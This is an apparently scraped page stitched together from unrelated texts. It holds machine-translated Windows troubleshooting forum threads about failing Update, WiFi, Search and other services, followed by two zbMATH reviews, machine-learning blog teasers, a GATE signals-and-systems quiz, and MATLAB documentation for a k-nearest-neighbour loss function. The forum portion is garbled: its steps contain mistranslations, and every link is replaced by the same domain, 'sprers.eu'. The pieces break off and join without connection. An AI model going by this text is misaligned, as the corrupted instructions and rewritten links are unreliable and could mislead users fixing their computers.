Whenever a try to do the manual update using this component I get the message; * Windows Update cannot currently check the update, because the service does not work, you may need to restart your computer *
My computer has a few updates, but can not run these update
Whenever I try to run computer shotdown/updates remain frozen for a while and stops without updating
He starts to run updates 1 of and stops
If I shutdown normal e, computer stay likehanging 1 hour without stopping.
I would like to know how to solve this problem
Thank you
Concerning
Hello
Were there any changes made on the computer before the show?
Perform the following methods and check:
Method 1:
I suggest you to check if you are able to access Windows Update service and ensure that the following services are started. If it is not started, follow these steps:
a. click Start, type sprers.eu and press enter.
b. search Windows Update.
c. right-click on the service and select Properties.
d. in type of startup, select enable.
e. click Start under the Service status.
f. click OK.
g. Repeat steps c to f for the following services:
Background Intelligent Transfer Service
Cryptographic services
If the steps do not help to solve the problem, you can go ahead with the methods mentioned below and check.
Method 2:
How to reset the Windows Update components?
sprers.eu
Method 3:
Your anti-virus software is in conflict with Windows updates. You can test this by temporarily disabling your antivirus:
Disable the antivirus software
sprers.eu
Note: Antivirus software can help protect your computer against viruses and other security threats. In most cases, you should not disable your antivirus software. If you need to disable temporarily to install other software, you must reactivate as soon as you are finished. If you are connected to the Internet or a network, while your antivirus software is disabled, your computer is vulnerable to attacks.
Method 4:
The problem with Microsoft Windows Update is not working
sprers.eu
sprers.eu
sprers.eu
I hope this helps.
• Error Windows update cannot currently check the updates because the service is not running, you must start the computer, windows update services does not
Original title: Windows Update service is not running / working and is not listed in sprers.eu
When I go to windows update a red shield with a white cross appears and when I click search for updates this message appears:
"Windows update cannot currently check updates because the service does not work, you will need to start the computer"
* Restared several times-nothing has changed
I checked in the services and WINDOWS UPDATE, Background Intelligent Transfer Service or encryption services are not listed!
* I have changed the settings to "Never search updates" and then back to "install updates automatically" - nothing has changed
* I ran the Malicious Software Removal Tool sprers.eu we say that everything was ok, but I can't always verify updates
* I ran the download to reset windows update components sprers.eu but still I can not check updates
(Nothing is in the update history)
Am really worried!
Thank you!
Hello
Have you made changes on the computer before this problem?
Method 1:
You can try to start the fix - it and check. Check out the following link.
The problem with Microsoft Windows Update is not working
sprers.eu
Method 2:
You can read the following article.
Cannot install updates in Windows Vista, Windows 7, Windows Server and Windows Server R2
sprers.eu
Note: this section, method, or task contains steps that tell you how to modify the registry. However, serious problems can occur if you modify the registry incorrectly. Therefore, make sure that you proceed with caution. For added protection, back up the registry before you edit it. Then you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click on the number below to view the article in the Microsoft Knowledge Base. How to back up and restore the registry in Windows:
sprers.eu
Note: If bad sectors are detected when running check disk utility and attempt recovery of bad sectors is verified during the verification of the drive for errors, data in the bad sector can be lost as they tried to recover bad sectors.
Method 3:
I also suggest that you scan your computer with the Microsoft Security Scanner, which would help us to get rid of viruses, spyware and other malicious software.
The Microsoft Security Scanner is a downloadable security tool for free which allows analysis at the application and helps remove viruses, spyware and other malware. It works with your current antivirus software.
sprers.eu
Note: the Microsoft Safety Scanner expires 10 days after being downloaded. To restart a scan with the latest definitions of anti-malware, download and run the Microsoft Safety Scanner again.
Important: When performing analysis on the hard drive if bad sectors are found on the hard drive when parsing tent repair this sector if all available on which data can be lost.
• No wireless networks not found on laptop - the WiFi windows service does not work on this computer
Hello
I have a laptop model Toshiba P running Vista home premium and a lynksis WRT54G V8 router model. The WLAN light is solid and the internet light flashes on the Linksys. I have Comcast cable as my ISP.
I've seen reported similar problems. All of a sudden my wirless acess stopped working, some networks are displayed and I get the message 'windows wireless service does not work on the computer. I am not able to restart the windows wireless. I can't connect to the internet on the laptop. I have a DELL PC and can access the internet here if necessary.
In the network and Discovery Center, I see that network discovery is disabled. I can't set it to on.
Under system devices, I have the following network cards: Intel (r) Wireless WiFi Link AGN and Realtek RTL Family PCI - E Fast Ethernet NIC (NDIS).
Help, please. I'd appreciate any help. I need a good starting point for resolution and wouldn't start using suggestions that corrects other issues. I design financial systems and purchase online, but I'm not a technical person with regard to updates Vista, drivers, etc..
Thank you! After reviewing the responses to similar problems, can anyone suggest if I should try one of the following values: 1. run SCF/scannow at the command prompt I don't know what that's going to fix it and do not want to make the current problem worse. 2. download the driver for the network drivers. If you would be grateful if someone could help me find the driver and download it. 3 reinstall Windows Vista Home Premium SP1 since the restoration of Toshiba CD I would appreciate greatly any information. Donna
Hi blondswede,
You can try running sfc/scannow to see if you have corrupted files. That won't be a further problem on your pc. After that, you want to make sure you have the latest drivers for your laptop, especially drivers of the NIC (network card). Go to the following link to Toshiba for your model and download those:
sprers.eu?CT=SB&OS=&category=&MOID=&RPN=PSPB3U&modelFilter=PS&selCategory=3&selFamily=
If you're still having problems, and it has recently emerged as a problem, you can try to restore your system to a point in time before the problem started to use the system restore. Here are the steps to follow:
1. Click Start, type system restore in the search box, and then click System Restore in the list programs. If you are prompted for an administrator password or a confirmation, type your password or click on continue.
2. In the System Restore dialog box, click on choose a different restore point and then click Next.
3. In the list of restore points, click a restore point created before you started having the problem, and then click Next.
4. Click Finish.
The System Restore tool
If the problem you are experiencing started occurring recently, you can use the System Restore tool. Using this tool, you can restore the computer to an earlier point in time. The tool using System Restore may not necessarily help you determine the problem. When you use system restore to restore the computer to a previous state, the programs and updates that you have installed are removed.
To restore the operating system to an earlier point in time, follow these steps:
The computer restarts and system files and settings are back to the State they were in when the restore point was created.
Let us know how it works and if you need additional assistance.
Dave D
• Windows 7 search () still does not work.
Although I followed other dialogues forum on the subject and tried all the suggested solutions, Windows 7 Search still does not for me. It will be as stuff in Control Panel etc, but never files and documents.
Here's what I've done so far: -.
1. Run the troubleshooter of Search & Indexing, say things that I can't find the files or by e-mail. It detects any problems.
2. In Control Panel / programs and features, I checked that Windows Search is turned on. (The Indexing Service is turned off).
3. In Control Panel / folder Options, I checked that the default values of the research are defined.
4. I tried to rebuild the Index in Control Panel / Indexing Options.
5. I looked for the wandering registry key mentioned here: sprers.eu my system does not have it.
6. I checked that the files (for example, "My Documents") have set of permissions system.
7. I tried to switch to a different account username and research, which also do not work.
8. I compared all the settings on my desktop PC (that has the problem) with my laptop, which is also running Windows 7 Home Edition, and on which the search works very well. They are all the same.
What can I try?
Hi, Rob.
I worked my way through all the tips, but could not solve the problem. (I do not stop my AV - Avast - as it is also used on my laptop, which has never had a problem.) Finally I, reluctantly, created a new profile and copied all my files across, and search now works as it should.
Best regards
Richard
• Windows Diagnostics policy service does not
Windows Diagnostics policy service does not
Original title: Network wireless adapter NIC Ethernet network device
Hello
• What were the changes made before the problem occurred?
• When you receive this error message?
I suggest you try the given steps and check if it helps
Method 1: Try the steps from the link below
sprers.eu?T1=Tab03
Method 2: Try to restore the Transmission Control Protocol / Internet Protocol (TCP/IP).
The reset command is available in the IP of the utility of Word context. Follow these steps to use the reset command to reset TCP/IP manually:
1. to open a command prompt, click Start, click Run. Copy and paste (or type) that follows the command in the Open box, and then press ENTER: cmd
2. at the command prompt, copy and paste (or type) the following command and then press ENTER:
netsh int ip reset c:\sprers.eu
Note: If you do not specify a path of the directory for the log file, use the following command:
netsh int ip reset sprers.eu
3. restart the computer.
Change TCP/IP settings
sprers.eu
Method 3: If this does not work, uninstall and reinstall the network adapter
To uninstall the drivers follow the steps below
1. click on start, type device manager in the start search box and press ENTER. Click on continue. The Device Manager dialog box appears. If you are prompted for an administrator password or a confirmation, type the password, or click on continue.
2. in the list of device types, expand network adapters, and then look for the specific device.
3. right click on the device and then click Properties.
4. click on the driver tab.
5. click on uninstall.
6. click on OK.
Restart the computer, the default drivers would be installed.
• Windows could not start the IKE and Authip IPsec keying service modules on the local computer. Error the dependency service does not exist or has been marked for deletion.
Hi, I'm trying start the IKE and AUTHOP service from the SERVICES screen but I get this error:
Windows could not start the IKE and Authip IPsec keying service modules on the local computer. Error the dependency service does not exist or has been marked for deletion.
original title: ike and authip error the dependency service does not exist or has been marked for deletion
Hello
Remember to make changes to the computer before the show?
You can follow the below methods:
Method 1:Restart Windows and try to start the Security Center service.
If you still receive the same error, make sure that the WMI service is launched and running:
(a) click Start, run , and then type sprers.eu
(b) double-click Windows Management Instrumentation
(c) set its startup type to Automatic
(d) click Start to start the service, and then click OK
(e) restart Windows.
Method 2: Restart the service
Windows logs an error if the service IKE and AuthIP IPsec Keying Modules or the driver does not start, or suddenly, they end.
To restart the IKE and AuthIP IPsec Keying Modules service:
To perform this procedure, you must have membership in the local Administrators group, or must you have been delegated the appropriate authority.
(a) restart the service. You can do this from a command prompt or in the snap-snap-in Services Microsoft Management Console (MMC). Do one of the following:
· Start an administrative command prompt. Click Start, click principally made programs, Accessories, right-click guest, and then click run as administrator. At the command prompt, run the command net start ikeext.
· Click Start, type sprers.eu in the Search box and press ENTER. In the column name of the Services snap-in, right-click on IKE and AuthIP IPsec Keying Modulesand then click Start.
(b) if the attempt to restart the service fails, restart the computer. This forces all related and dependent services to restart.
(c) if the error persists after restarting the computer, then the executable files for the driver or service may be damaged, and the operating system must be reinstalled.
Note:
You can check that the IKE and AuthIP IPsec Keying Modules (IKEEXT) service runs by using the Component Services Microsoft Management Console (MMC) or the net start command line tool.
You can check the link: sprers.eu (WS) .aspx
Method 3: Run a scan of the System File Checker.
sprers.eu
It will be useful.
• Error / base OS Windows 8 / Bluetooth service does not start
Error / base OS Windows 8 / Bluetooth service does not start - I tried sprers.eu-> selecting Bluetooth support Service-> properties-> log on-> This account-(Administrator) / (NT AUTHORITY\LocalService) / / but nothing works, I had searched a lot on this problem but there is no solution to the problem of basic windows 8 (built in) only for win 7 and windows server .but not for the basic version of windows 8 that I have
Now when I click to start the Bluetooth support service it always says error
Hello
Please, try the steps here to solve this problem:
sprers.eu
Hotfix applies to Windows 8 too and you must only put NT AUTHORITY\LocalService on the properties of the service.
Hope this helps, good luck :)
• Windows Defender service does not start on Windows 7
On my laptop, Windows Defender is no longer in effect. Reads the message: the service does not start. When I manually try to start the Defender, the massage is: file not found!
I can't remove Defender another upodate no longer works.
Someone knows a solution?
Hello
Go to configuration-system board and security - administrative tools - services. Find the windows defender and double-click it. Then choose, auto start option, click on apply. turn it back on.
sprers.eu
• Windows 7, update services does not work
I have a problem to update software in windows 7.
I have a HP G72 laptop.
I replaced my hard drive. GB, Western Digital Go digital West.
-J' made an image of the C partitie (if it is 3 months, installed for the recovery partition, new updated worked after that).
The new disk hard there however any possible updates of windows. (the bar is red on the left).
-After that, I reinstalled the original image when the laptop was new (DVD image). Same result on updates.
-Checked the status of services: windows update is statred and in automatic mode.
-Downloaded System Update Readiness of windows to resolve the error (Windows6 1 - KB - v3 - x 64). When installing, I get the error 0xc So I'm not able to install this software.
Looked after errors in the sprers.eu newspaper: found M²: cannot read the time value RptTime from the registry. [HRESULT = 0 X ERROR_NOT_FOUND]
Do a clean boot, without result.
Does anyone know a solution to this problem.
Thank you.
Ed.
Windows 7, update services does not, RESOLVED.
The problem occurs when you change your hard drive for a bigger, in my hard drive of the case a GB Western Digital WD GB drive hard.
For the Windows automatic updates again you need update the Intel Rapid Storage Technology Driverdriver. It will not be updated when you have intel check your drivers! For me, only the version worked. This driver can be found at sprers.eu .
Versions available at sprers.eu?lang=eng & ProductFamily = Software + Products & ProductLine = Chipset + Software & ProductProduct = Intel % c2% ae + Rapid + Storage + Technology + (Intel % c2% ae + RST) did not work for me (I tried the form version 08/08/) Why does not the superior version is not clear to me.
Good luck to solve you yours it took me two weeks to find it.
Ed.
• Uninstall
|
|
# zbMATH — the first resource for mathematics
Minimal surfaces in $$M^2\times \mathbb{R}$$. (English) Zbl 1036.53008
This work is about minimal surfaces in the product of a 2-dimensional Riemannian surface $$M$$ with the real line $$\mathbb{R}$$. Here $$M$$ is either (a) the 2-sphere or (b) the hyperbolic plane or (c) a Riemannian surface with a complete non-negative curvature metric. The examples of such minimal surfaces in this paper generally are constructed using Plateau techniques, and the examples given include analogues to 1) Scherk’s periodic minimal surfaces 2) unduloids (found by Pedrosa and Ritore, but proven to exist by a different method here) and 3) helicoids. Some minimal surfaces of higher genus are also found.
There are also a fair number of general results about such minimal surfaces; we list those results here that can be stated without many technical details (although the more technical results are also interesting):
1) If $$M$$ is the round sphere, then the only compact minimal surfaces in $$M\times \mathbb{R}$$ are of the form $$M \times t$$ for some fixed $$t\in \mathbb{R}$$.
2) If $$M$$ is compact and the minimal surface is topologically a punctured disk, then it is also conformally a punctured disk (and more specific information about the conformal parametrization is given).
3) If $$M$$ is the round sphere and the minimal surface is properly embedded with finite topology, then either it has exactly one top end and one bottom end or it is of the form $$M \times t$$ for some fixed $$t\in \mathbb{R}$$.
4) If $$M$$ is the round sphere and there are two given properly embedded minimal surfaces in $$M\times \mathbb{R}$$, then the two surfaces either intersect or are of the form $$M \times t_1$$ and $$M\times t_2$$ for some fixed $$t_1$$ and $$t_2\in \mathbb{R}$$.
5) If $$M$$ is the round sphere, then a properly immersed minimal surface meets every flat vertical annulus.
6) If $$M$$ has nonnegative curvature, then a properly immersed minimal surface in $$M\times \mathbb{R}$$ is parabolic.
7) If $$M$$ is the hyperbolic plane, then any properly immersed minimal surface in a half-space $$M\times [0,\infty)$$ must be of the form $$M\times t$$ for some fixed $$t\in \mathbb{R}$$.
8) When $$M$$ is the hyperbolic plane, there are some results on the existence of minimal graphs with given boundary, including a Jenkins-Serrin type result.
##### MSC:
53A10 Minimal surfaces in differential geometry, surfaces with prescribed mean curvature 35J99 Elliptic equations and elliptic systems 49Q05 Minimal surfaces and optimization
Full Text:
|
|
## Otsu’s method for image thresholding explained and implemented
The process of separating the foreground pixels from the background is called thresholding. There are many ways of achieving optimal thresholding and one of the ways is called the Otsu’s method, proposed by Nobuyuki Otsu. Otsu’s method[1] is a variance-based technique to find the threshold value where the weighted variance between the foreground and background …
## Linear Regression using Gradient Descent Algorithm
Gradient descent is an optimization method used to find the minimum value of a function by iteratively updating the parameters of the function. Parameters refer to coefficients in Linear Regression and weights in Neural Networks. In a linear regression problem, we find a modal that gives an approximate representation of our dataset. In the below …
## Mathematics of Principal component analysis
Principal component analysis is a method used to reduce the number of dimensions in a dataset without losing much information. It’s used in many fields such as face recognition and image compression, and is a common technique for finding patterns in data and also in the visualization of higher dimensional data. PCA is all about …
## Evaluating the fitness of a modal with a cost function
Previously we derived a simple linear regression modal for our Pizza price dataset. We built a modal that predicted a price of $13.68 for a 12 inch pizza. When the same modal is used to predict the price of an 8 inch pizza, we get$9.78 which is around $0.78 more than the known price of$9. …
## Math behind Linear Regression with Python code
Simple linear regression is a statistical method you can use to study relationships between two continuous (quantitative) variables: independent variable (x) – also referred to as predictor or explanatory variable dependant variable (y) – also referred to as response or outcome The goal of any regression model is to predict the value of y (dependant variable) based on the …
## Understanding Binomial Distribution using Python
Binomial distribution is used to understand the probability of a particular outcome in repeated independent trials. The probability of a trial is either success or failure. The trials are independent as the outcome or the previous trial had no effect on the next trial, as happens in tossing of coins. If we flip a coin, it would either …
## Poisson distribution with Python
A Poisson distribution is the probability distribution of independent occurrences in an interval. Poisson distribution is used for count-based distributions where these events happen with a known average rate and independently of the time since the last event. For example, If the average number of cars that cross a particular street in a day is 25, …
## Markow chain explained in simple words
Markow chain is a probabilistic process used to predict the next step based on the probabilities of the existing related states. Its called a chain because the probability of the next step is dependant on the other steps in the group. For example, if the weather is cloudy then its highly likely that it might rain (The next …
|
|
• Save
• Share
# Signals and Systems for GATE EC Quiz 1
2 years ago .
Here is Signals and Systems for GATE EC Quiz 1 to help you prepare for your upcoming GATE exam. The GATE EC paper has several subjects, each one as important as the last. However, one of the most important subjects in GATE EC is Signals and Systems. The subject is vast, but practice makes tackling it easy.
This quiz contains important questions which match the pattern of the GATE exam. Check your preparation level in every chapter of Signals and Systems for GATE. Simply take the quiz and comparing your ranks. Learn about control system, Feedback principle and more.
Signals and Systems for GATE EC Quiz 1
Que. 1
A real valued signal x(t) limited to frequency band $$\left| f \right| < \frac{\omega }{2}$$ is passed through an LTI system whose frequency response is
$$H\left( f \right) = \;\left\{ {\begin{array}{*{20}{c}} {{e^{ - j4\pi f}},}&{\left| f \right| < \frac{\omega }{2}}\\ {0,}&{\left| f \right| > 0} \end{array}} \right.$$
The output of the system is
1.
$$x(t+4)$$
2.
$$x(t-4)$$
3.
$$x(t+2)$$
4.
$$x(t-2)$$
Que. 2
The unilateral Laplace transform of $$f\left( t \right) = \frac{1}{{{s^2} + s + 1}}$$. Which one of the following is unilateral Laplace transform of $$g(t)=tf(t)$$?
1.
$$\frac{{ - s}}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
2.
$$\frac{-({2s + 1})}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
3.
$$\frac{{ s}}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
4.
$$\frac{({2s + 1})}{{{{\left( {{s^2} + s + 1} \right)}^2}}}$$
Que. 3
A stable LTI system has transfer function $$H\left( s \right) = \frac{1}{{{s^2} + s - 6}}$$. To make this system causal it needs to be cascaded with another LTI system having transfer function $$\rm{H_1(s)}$$. Correct choice for $$\rm{H_1(s)}$$ is
1.
$$\rm{s+3}$$
2.
$$\rm{s-2}$$
3.
$$\rm{s-6}$$
4.
$$\rm{s+1}$$
Que. 4
The LTI system is given as $$y\left[ n \right] = \alpha y\left[ {n - 1} \right] + \beta x\left[ n \right]$$
If impulse response is given as $$\mathop \sum \limits_{n = 0}^\infty h\left[ n \right] = 2,$$ the relationship between $$\alpha$$ and $$\beta$$ is:
1.
$$\;\alpha = 1 - \frac{\beta }{2}$$
2.
$$\alpha = 1 + \frac{\beta }{2}$$
3.
$$\alpha = 2\beta$$
4.
$$\;\alpha = - 2\beta$$
Que. 5
Which of the following statements is $$\rm{\textbf{not true}}$$ for continuous time causal and stable LTI system.
1.
All poles must lie on left side of jω – axis
2.
Zeros of the system can lie anywhere in s – plane
3.
All poles must lie within |s|=1
4.
All the roots of the characteristics equation must be located on left side of jω axis
## More Signals and Systems for GATE EC Quizzes:
Try 1000+ Questions on our App.
• Save
8 months ago
1 year ago
2 years ago
2 years ago
|
|
# zbMATH — the first resource for mathematics
Asymmetric covariance estimates of Brascamp-Lieb type and related inequalities for log-concave measures. (English. French summary) Zbl 1270.26016
Summary: An inequality of Brascamp and Lieb provides a bound on the covariance of two functions with respect to log-concave measures. The bound estimates the covariance by the product of the $$L^{2}$$ norms of the gradients of the functions, where the magnitude of the gradient is computed using an inner product given by the inverse Hessian matrix of the potential of the log-concave measure. G. Menz and F. Otto [“Uniform logarithmic Sobolev inequalities for conservative spin systems with super-quadratic single-site potential”, Preprint (2011)] proved a variant of this with the two $$L^{2}$$ norms replaced by $$L^{1}$$ and $$L^{\infty}$$ norms, but only for $$\mathbb{R}^{1}$$. We prove a generalization of both by extending these inequalities to $$L^{p}$$ and $$L^{q}$$ norms and on $$\mathbb{R}^{n}$$, for any $$n\geq1$$. We also prove an inequality for integrals of divided differences of functions in terms of integrals of their gradients.
##### MSC:
26D10 Inequalities involving derivatives and differential and integral operators
##### Keywords:
convexity; log-concavity; Poincaré inequality
Full Text:
##### References:
[1] S. G. Bobkov. Isoperimetric and analytic inequalities for log-concave probability measures. Ann. Probab. 27 (1999) 1903-1921. · Zbl 0964.60013 · doi:10.1214/aop/1022677553 [2] S. Bobkov and M. Ledoux. From Brunn-Minkowski to Brascamp-Lieb and to logarithmic Sobolev inequalities. Geom. Funct. Anal. 10 (2000) 1028-1052. · Zbl 0969.26019 · doi:10.1007/PL00001645 [3] T. Bodineau and B. Helffer. The log-Sobolev inequalities for unbounded spin systems. J. Funct. Anal. 166 (1999) 168-178. · Zbl 0972.82035 · doi:10.1006/jfan.1999.3419 [4] H. J. Brascamp and E. H. Lieb. On extensions of the Brunn-Minkovski and Prékopa-Leindler theorems, including inequalities for log-concave functions, and with an application to the diffusion equation. J. Funct. Anal. 22 (1976) 366-389. · Zbl 0334.26009 · doi:10.1016/0022-1236(76)90004-5 [5] D. Cordero-Erausquin. On Berndtsson’s generalization of Prékopa’s theorem. Math. Z. 249 (2005) 401-410. · Zbl 1079.32020 · doi:10.1007/s00209-004-0704-6 [6] N. Grunewald, F. Otto, C. Villani and M. G. Westdickenberg. A two-scale approach to logarithmic Sobolev inequalities and the hydrodynamic limit. Ann. Inst. Henri Poincaré Probab. Stat. 45 (2009) 302-351. · Zbl 1179.60068 · doi:10.1214/07-AIHP200 · eudml:78025 [7] O. Guédon. Kahane-Khinchine type inequalities for negative exponent. Mathematika 46 (1999) 165-173. · Zbl 0965.26011 · doi:10.1112/S002557930000766X [8] L. Hörmander. $$L^{2}$$ estimates and existence theorems for the $$\bar{\partial}$$ operator. Acta Math. 113 (1965) 89-152. · Zbl 0158.11002 · doi:10.1007/BF02391775 [9] R. Kannan, L. Lovász and M. Simonovits. Isoperimetric problems for convex bodies and a localization lemma. Discrete Comput. Geom. 13 (1995) 541-559. · Zbl 0824.52012 · doi:10.1007/BF02574061 · eudml:131379 [10] C. Landim, G. Panizo and H. T. Yau. Spectral gap and logarithmic Sobolev inequality for unbounded conservative spin systems. Ann. Inst. Henri Poincaré Prob. Stat. 38 (2002) 739-777. · Zbl 1022.60087 · doi:10.1016/S0246-0203(02)01108-1 · numdam:AIHPB_2002__38_5_739_0 · eudml:77731 [11] E. H. Lieb and M. Loss. Analysis , 2nd edition. Amer. Math. Soc., Providence, RI, 2001. · Zbl 0966.26002 [12] G. Menz and F. Otto. Uniform logarithmic Sobolev inequalities for conservative spin systems with super-quadratic single-site potential. Preprint, 2011. · Zbl 1282.60096 [13] F. Otto and M. G. Reznikoff. A new criterion for the logarithmic Sobolev inequality and two applications. J. Funct. Anal. 243 (2007) 121-157. · Zbl 1109.60013 · doi:10.1016/j.jfa.2006.10.002
This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching.
|
|
loss
Loss of k-nearest neighbor classifier
Description
L = loss(mdl,Tbl,ResponseVarName) returns a scalar representing how well mdl classifies the data in Tbl when Tbl.ResponseVarName contains the true classifications. If Tbl contains the response variable used to train mdl, then you do not need to specify ResponseVarName.
When computing the loss, the loss function normalizes the class probabilities in Tbl.ResponseVarName to the class probabilities used for training, which are stored in the Prior property of mdl.
The meaning of the classification loss (L) depends on the loss function and weighting scheme, but, in general, better classifiers yield smaller classification loss values. For more details, see Classification Loss.
L = loss(mdl,Tbl,Y) returns a scalar representing how well mdl classifies the data in Tbl when Y contains the true classifications.
When computing the loss, the loss function normalizes the class probabilities in Y to the class probabilities used for training, which are stored in the Prior property of mdl.
example
L = loss(mdl,X,Y) returns a scalar representing how well mdl classifies the data in X when Y contains the true classifications.
When computing the loss, the loss function normalizes the class probabilities in Y to the class probabilities used for training, which are stored in the Prior property of mdl.
L = loss(___,Name,Value) specifies options using one or more name-value pair arguments in addition to the input arguments in previous syntaxes. For example, you can specify the loss function and the classification weights.
Note
If the predictor data in X or Tbl contains any missing values and LossFun is not set to "classifcost", "classiferror", or "mincost", the loss function can return NaN. For more details, see loss can return NaN for predictor data with missing values.
Examples
collapse all
Create a k-nearest neighbor classifier for the Fisher iris data, where k = 5.
Load the Fisher iris data set.
Create a classifier for five nearest neighbors.
mdl = fitcknn(meas,species,'NumNeighbors',5);
Examine the loss of the classifier for a mean observation classified as 'versicolor'.
X = mean(meas);
Y = {'versicolor'};
L = loss(mdl,X,Y)
L = 0
All five nearest neighbors classify as 'versicolor'.
Input Arguments
collapse all
k-nearest neighbor classifier model, specified as a ClassificationKNN object.
Sample data used to train the model, specified as a table. Each row of Tbl corresponds to one observation, and each column corresponds to one predictor variable. Optionally, Tbl can contain one additional column for the response variable. Multicolumn variables and cell arrays other than cell arrays of character vectors are not allowed.
If Tbl contains the response variable used to train mdl, then you do not need to specify ResponseVarName or Y.
If you train mdl using sample data contained in a table, then the input data for loss must also be in a table.
Data Types: table
Response variable name, specified as the name of a variable in Tbl. If Tbl contains the response variable used to train mdl, then you do not need to specify ResponseVarName.
You must specify ResponseVarName as a character vector or string scalar. For example, if the response variable is stored as Tbl.response, then specify it as 'response'. Otherwise, the software treats all columns of Tbl, including Tbl.response, as predictors.
The response variable must be a categorical, character, or string array, logical or numeric vector, or cell array of character vectors. If the response variable is a character array, then each element must correspond to one row of the array.
Data Types: char | string
Predictor data, specified as a numeric matrix. Each row of X represents one observation, and each column represents one variable.
Data Types: single | double
Class labels, specified as a categorical, character, or string array, logical or numeric vector, or cell array of character vectors. Each row of Y represents the classification of the corresponding row of X.
Data Types: categorical | char | string | logical | single | double | cell
Name-Value Arguments
Specify optional pairs of arguments as Name1=Value1,...,NameN=ValueN, where Name is the argument name and Value is the corresponding value. Name-value arguments must appear after other arguments, but the order of the pairs does not matter.
Before R2021a, use commas to separate each name and value, and enclose Name in quotes.
Example: loss(mdl,Tbl,'response','LossFun','exponential','Weights','w') returns the weighted exponential loss of mdl classifying the data in Tbl. Here, Tbl.response is the response variable, and Tbl.w is the weight variable.
Loss function, specified as the comma-separated pair consisting of 'LossFun' and a built-in loss function name or a function handle.
• The following table lists the available loss functions.
ValueDescription
'binodeviance'Binomial deviance
'classifcost'Observed misclassification cost
'classiferror'Misclassified rate in decimal
'exponential'Exponential loss
'hinge'Hinge loss
'logit'Logistic loss
'mincost'Minimal expected misclassification cost (for classification scores that are posterior probabilities)
'mincost' is appropriate for classification scores that are posterior probabilities. By default, k-nearest neighbor models return posterior probabilities as classification scores (see predict).
• You can specify a function handle for a custom loss function using @ (for example, @lossfun). Let n be the number of observations in X and K be the number of distinct classes (numel(mdl.ClassNames)). Your custom loss function must have this form:
function lossvalue = lossfun(C,S,W,Cost)
• C is an n-by-K logical matrix with rows indicating the class to which the corresponding observation belongs. The column order corresponds to the class order in mdl.ClassNames. Construct C by setting C(p,q) = 1, if observation p is in class q, for each row. Set all other elements of row p to 0.
• S is an n-by-K numeric matrix of classification scores. The column order corresponds to the class order in mdl.ClassNames. The argument S is a matrix of classification scores, similar to the output of predict.
• W is an n-by-1 numeric vector of observation weights. If you pass W, the software normalizes the weights to sum to 1.
• Cost is a K-by-K numeric matrix of misclassification costs. For example, Cost = ones(K) – eye(K) specifies a cost of 0 for correct classification and 1 for misclassification.
• The output argument lossvalue is a scalar.
For more details on loss functions, see Classification Loss.
Data Types: char | string | function_handle
Observation weights, specified as the comma-separated pair consisting of 'Weights' and a numeric vector or the name of a variable in Tbl.
If you specify Weights as a numeric vector, then the size of Weights must be equal to the number of rows in X or Tbl.
If you specify Weights as the name of a variable in Tbl, the name must be a character vector or string scalar. For example, if the weights are stored as Tbl.w, then specify Weights as 'w'. Otherwise, the software treats all columns of Tbl, including Tbl.w, as predictors.
loss normalizes the weights so that observation weights in each class sum to the prior probability of that class. When you supply Weights, loss computes the weighted classification loss.
Example: 'Weights','w'
Data Types: single | double | char | string
Algorithms
collapse all
Classification Loss
Classification loss functions measure the predictive inaccuracy of classification models. When you compare the same type of loss among many models, a lower loss indicates a better predictive model.
Consider the following scenario.
• L is the weighted average classification loss.
• n is the sample size.
• For binary classification:
• yj is the observed class label. The software codes it as –1 or 1, indicating the negative or positive class (or the first or second class in the ClassNames property), respectively.
• f(Xj) is the positive-class classification score for observation (row) j of the predictor data X.
• mj = yjf(Xj) is the classification score for classifying observation j into the class corresponding to yj. Positive values of mj indicate correct classification and do not contribute much to the average loss. Negative values of mj indicate incorrect classification and contribute significantly to the average loss.
• For algorithms that support multiclass classification (that is, K ≥ 3):
• yj* is a vector of K – 1 zeros, with 1 in the position corresponding to the true, observed class yj. For example, if the true class of the second observation is the third class and K = 4, then y2* = [0 0 1 0]′. The order of the classes corresponds to the order in the ClassNames property of the input model.
• f(Xj) is the length K vector of class scores for observation j of the predictor data X. The order of the scores corresponds to the order of the classes in the ClassNames property of the input model.
• mj = yj*f(Xj). Therefore, mj is the scalar classification score that the model predicts for the true, observed class.
• The weight for observation j is wj. The software normalizes the observation weights so that they sum to the corresponding prior class probability stored in the Prior property. Therefore,
$\sum _{j=1}^{n}{w}_{j}=1.$
Given this scenario, the following table describes the supported loss functions that you can specify by using the LossFun name-value argument.
Loss FunctionValue of LossFunEquation
Binomial deviance'binodeviance'$L=\sum _{j=1}^{n}{w}_{j}\mathrm{log}\left\{1+\mathrm{exp}\left[-2{m}_{j}\right]\right\}.$
Observed misclassification cost'classifcost'
$L=\sum _{j=1}^{n}{w}_{j}{c}_{{y}_{j}{\stackrel{^}{y}}_{j}},$
where ${\stackrel{^}{y}}_{j}$ is the class label corresponding to the class with the maximal score, and ${c}_{{y}_{j}{\stackrel{^}{y}}_{j}}$ is the user-specified cost of classifying an observation into class ${\stackrel{^}{y}}_{j}$ when its true class is yj.
Misclassified rate in decimal'classiferror'
$L=\sum _{j=1}^{n}{w}_{j}I\left\{{\stackrel{^}{y}}_{j}\ne {y}_{j}\right\},$
where I{·} is the indicator function.
Cross-entropy loss'crossentropy'
'crossentropy' is appropriate only for neural network models.
The weighted cross-entropy loss is
$L=-\sum _{j=1}^{n}\frac{{\stackrel{˜}{w}}_{j}\mathrm{log}\left({m}_{j}\right)}{Kn},$
where the weights ${\stackrel{˜}{w}}_{j}$ are normalized to sum to n instead of 1.
Exponential loss'exponential'$L=\sum _{j=1}^{n}{w}_{j}\mathrm{exp}\left(-{m}_{j}\right).$
Hinge loss'hinge'$L=\sum _{j=1}^{n}{w}_{j}\mathrm{max}\left\{0,1-{m}_{j}\right\}.$
Logit loss'logit'$L=\sum _{j=1}^{n}{w}_{j}\mathrm{log}\left(1+\mathrm{exp}\left(-{m}_{j}\right)\right).$
Minimal expected misclassification cost'mincost'
'mincost' is appropriate only if classification scores are posterior probabilities.
The software computes the weighted minimal expected classification cost using this procedure for observations j = 1,...,n.
1. Estimate the expected misclassification cost of classifying the observation Xj into the class k:
${\gamma }_{jk}={\left(f{\left({X}_{j}\right)}^{\prime }C\right)}_{k}.$
